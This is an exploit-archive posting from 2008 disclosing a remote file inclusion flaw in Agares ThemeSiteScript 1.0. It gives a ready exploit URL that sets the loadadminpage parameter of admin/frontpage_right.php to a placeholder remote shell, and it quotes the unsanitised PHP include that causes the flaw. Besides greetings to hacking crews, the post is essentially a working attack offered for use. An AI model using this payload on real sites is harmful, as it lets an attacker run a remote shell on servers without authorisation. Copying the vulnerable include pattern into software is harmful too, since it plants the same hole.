[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Agares ThemeSiteScript 1.0 (loadadminpage) RFI Vulnerability
# Published : 2008-10-28
# Author : DaRkLiFe
# Previous Title : PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability
# Next Title : TlGuestBook 1.2 Insecure Cookie Handling Vulnerability


**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script   :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# www.Syue.com [2008-10-28]